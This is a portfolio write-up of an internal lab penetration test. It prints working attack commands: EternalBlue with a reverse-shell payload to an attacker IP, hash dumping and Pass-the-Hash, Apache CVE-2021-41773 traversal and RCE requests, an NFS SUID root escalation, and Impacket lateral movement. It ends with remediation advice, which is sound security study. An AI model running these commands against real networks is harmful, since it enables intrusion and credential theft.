N E T H R A N. W E D A G E

Loading

Cybersecurity undergraduate and web developer based in Sri Lanka, passionate about penetration testing, VAPT, and ethical hacking.

Contact Info

Hire Me
Hire Me
Home / Portfolio / VAPT / Network VAPT — Internal Lab
cat ~/vapt/vapt-network-lab.md
VAPT

Network VAPT — Internal Lab

05 Aug 2024 Network CVSS 6.8 Medium Severity

Internal network vulnerability assessment — open ports, weak protocols, unpatched services and misconfigured firewall rules identified and documented.

Network Nessus OpenVAS CVSS
Writeup

Network VAPT — Internal Lab

This writeup documents an internal network Vulnerability Assessment and Penetration Test (VAPT) conducted against a simulated corporate lab environment. The engagement simulates a threat actor with initial internal network access — such as a compromised workstation or rogue device. Testing covers host discovery, service enumeration, exploitation of vulnerable services, credential attacks, and lateral movement across the internal network.

Engagement Info

  • Target: Internal lab network (192.168.1.0/24)
  • Type: Internal Network VAPT — Grey Box
  • Methodology: PTES (Penetration Testing Execution Standard)
  • Tools: Nmap, Metasploit, Nessus, CrackMapExec, Impacket

Step 1 — Host Discovery

Testing began with a sweep of the internal subnet to identify all live hosts before any targeted enumeration: 

# ARP sweep — fast and reliable on local networks
netdiscover -r 192.168.1.0/24

# ICMP + TCP host discovery with Nmap
nmap -sn 192.168.1.0/24 -oN hosts.txt

# Identify live hosts from output
grep "report for" hosts.txt

Live hosts identified on the network:

  • 192.168.1.1 — Gateway / Router
  • 192.168.1.10 — Windows Server 2016 (DC)
  • 192.168.1.20 — Windows 10 Workstation
  • 192.168.1.30 — Linux web server (Ubuntu)
  • 192.168.1.40 — Linux file server (CentOS)

All four internal hosts were added to scope for detailed enumeration in the next phase.

Step 2 — Service Enumeration

A full port scan with version detection and default scripts was run against all in-scope hosts: 

# Full scan against all live hosts
nmap -sV -sC -p- --min-rate 3000 \
  192.168.1.10,20,30,40 -oN services.txt

# UDP scan for key services
nmap -sU -p 53,67,69,161,500 \
  192.168.1.0/24

Key services discovered:

  • 192.168.1.10 — DNS (53), LDAP (389), SMB (445), RDP (3389), Kerberos (88)
  • 192.168.1.20 — SMB (445), RDP (3389), WinRM (5985)
  • 192.168.1.30 — HTTP (80), HTTPS (443), SSH (22), MySQL (3306)
  • 192.168.1.40 — FTP (21), SSH (22), NFS (2049), Samba (445)

Step 3 — Vulnerability Scanning

Nessus was used to perform an authenticated vulnerability scan across all hosts to identify known CVEs and misconfigurations: 

# Nessus scan — key critical findings:
# 192.168.1.10 — MS17-010 EternalBlue (Critical)
# 192.168.1.20 — BlueKeep RDP CVE-2019-0708 (Critical)
# 192.168.1.30 — Apache 2.4.49 Path Traversal CVE-2021-41773
# 192.168.1.40 — Anonymous FTP enabled (Medium)
#              — NFS export with no_root_squash (High)
#              — Samba null session allowed (Medium)

Critical findings on the Windows hosts were prioritised for manual exploitation to confirm exploitability beyond automated scanner detection.

Step 4 — Exploitation (EternalBlue — DC)

The Domain Controller at 192.168.1.10 was confirmed vulnerable to MS17-010. Exploitation was performed using Metasploit: 

msfconsole -q
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.10
set LHOST 192.168.1.100   # attacker IP
set LPORT 4444
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run

The exploit returned a Meterpreter session as SYSTEM:

getuid
# Server username: NT AUTHORITY\SYSTEM

# Dump all local and domain hashes
hashdump
run post/windows/gather/smart_hashdump

NTLM hashes for all domain accounts including the Domain Admin were extracted from the domain controller's SAM and NTDS.dit.

Step 5 — Credential Attacks

Extracted NTLM hashes were cracked offline with Hashcat and used directly in Pass-the-Hash attacks across the network: 

# Crack NTLM hashes with Hashcat
hashcat -m 1000 hashes.txt \
  /usr/share/wordlists/rockyou.txt

# Pass-the-Hash with CrackMapExec
crackmapexec smb 192.168.1.0/24 \
  -u Administrator \
  -H <NTLM_hash> \
  --shares

# Dump SAM remotely via PTH
crackmapexec smb 192.168.1.20 \
  -u Administrator \
  -H <NTLM_hash> \
  --sam

Pass-the-Hash succeeded against the workstation at 192.168.1.20 — confirming credential reuse across the domain without requiring the plaintext password.

Step 6 — Linux Host Exploitation

The Apache server at 192.168.1.30 was running version 2.4.49 — vulnerable to CVE-2021-41773 path traversal and remote code execution: 

# Path traversal — read /etc/passwd
curl "http://192.168.1.30/cgi-bin/.%2e/.%2e/etc/passwd"

# RCE via mod_cgi (if enabled)
curl -X POST \
  "http://192.168.1.30/cgi-bin/.%2e/.%2e/bin/sh" \
  --data "echo;id"
# uid=33(www-data)

The file server at 192.168.1.40 exposed an NFS share with no_root_squash set — allowing a local root escalation by mounting the share and writing an SUID binary: 

# Mount the NFS share
showmount -e 192.168.1.40
mount -t nfs 192.168.1.40:/data /mnt/nfs

# Write SUID shell to mounted share
cp /bin/bash /mnt/nfs/rootshell
chmod +s /mnt/nfs/rootshell

# Execute on the file server to get root
/data/rootshell -p
# whoami: root

Step 7 — Lateral Movement

With domain admin credentials obtained from the DC, lateral movement was performed across the network using Impacket's suite of tools: 

# Remote command execution via WMI
python3 wmiexec.py \
  domain/Administrator:password@192.168.1.20

# Remote shell via SMB
python3 psexec.py \
  domain/Administrator:password@192.168.1.20

# Dump credentials from all reachable hosts
crackmapexec smb 192.168.1.0/24 \
  -u Administrator -p password \
  --lsa

Full network compromise was achieved — all four hosts were under attacker control with SYSTEM or root level access.

Step 8 — Reporting

All findings were documented in a structured network VAPT report with the following sections per vulnerability:

  • Severity — Critical / High / Medium / Low / Informational
  • CVSS v3.1 score and affected host
  • Proof of exploitation — screenshots and command output
  • Business impact — data at risk, lateral movement potential
  • Remediation — specific patch versions or configuration fixes

Priority remediation recommendations included patching MS17-010 and CVE-2021-41773 immediately, disabling NFS no_root_squash, enforcing unique local admin passwords, and enabling SMB signing across all hosts to prevent relay attacks.

Key Takeaways

  • Unpatched critical CVEs like MS17-010 give direct SYSTEM access — patch immediately
  • Password reuse across hosts enables Pass-the-Hash attacks without cracking — enforce unique passwords
  • NFS no_root_squash is a critical misconfiguration — always set root_squash
  • SMB signing disabled allows NTLM relay attacks — enforce signing across the domain
  • Domain Controllers must be hardened first — compromising the DC means full network compromise
  • Lateral movement is trivial with domain admin credentials — segment networks and limit privilege scope

Tools Used

  • Nmap — host discovery, port scanning, and service enumeration
  • Nessus — authenticated vulnerability scanning
  • Metasploit — EternalBlue exploitation and post-exploitation
  • CrackMapExec — SMB enumeration, Pass-the-Hash, and credential spraying
  • Impacket — psexec, wmiexec, secretsdump, and GetUserSPNs
  • Hashcat — offline NTLM hash cracking
  • netdiscover — ARP-based host discovery
  • curl — manual CVE-2021-41773 path traversal testing
Project Info
Category VAPT
Difficulty Medium Severity
OS / Target Network
Points CVSS 6.8
Date 05 Aug 2024
Tools Used
Nessus OpenVAS Nmap Wireshark
Actions
Back to VAPT Get In Touch
More VAPT
VAPT
Web App VAPT — Sample Target

Full web application vulnerability assessment. Identified SQL Injection, XSS, IDOR and broken authentication. CVSS-rated report with PoC and remediation steps.

Jul 2024 Details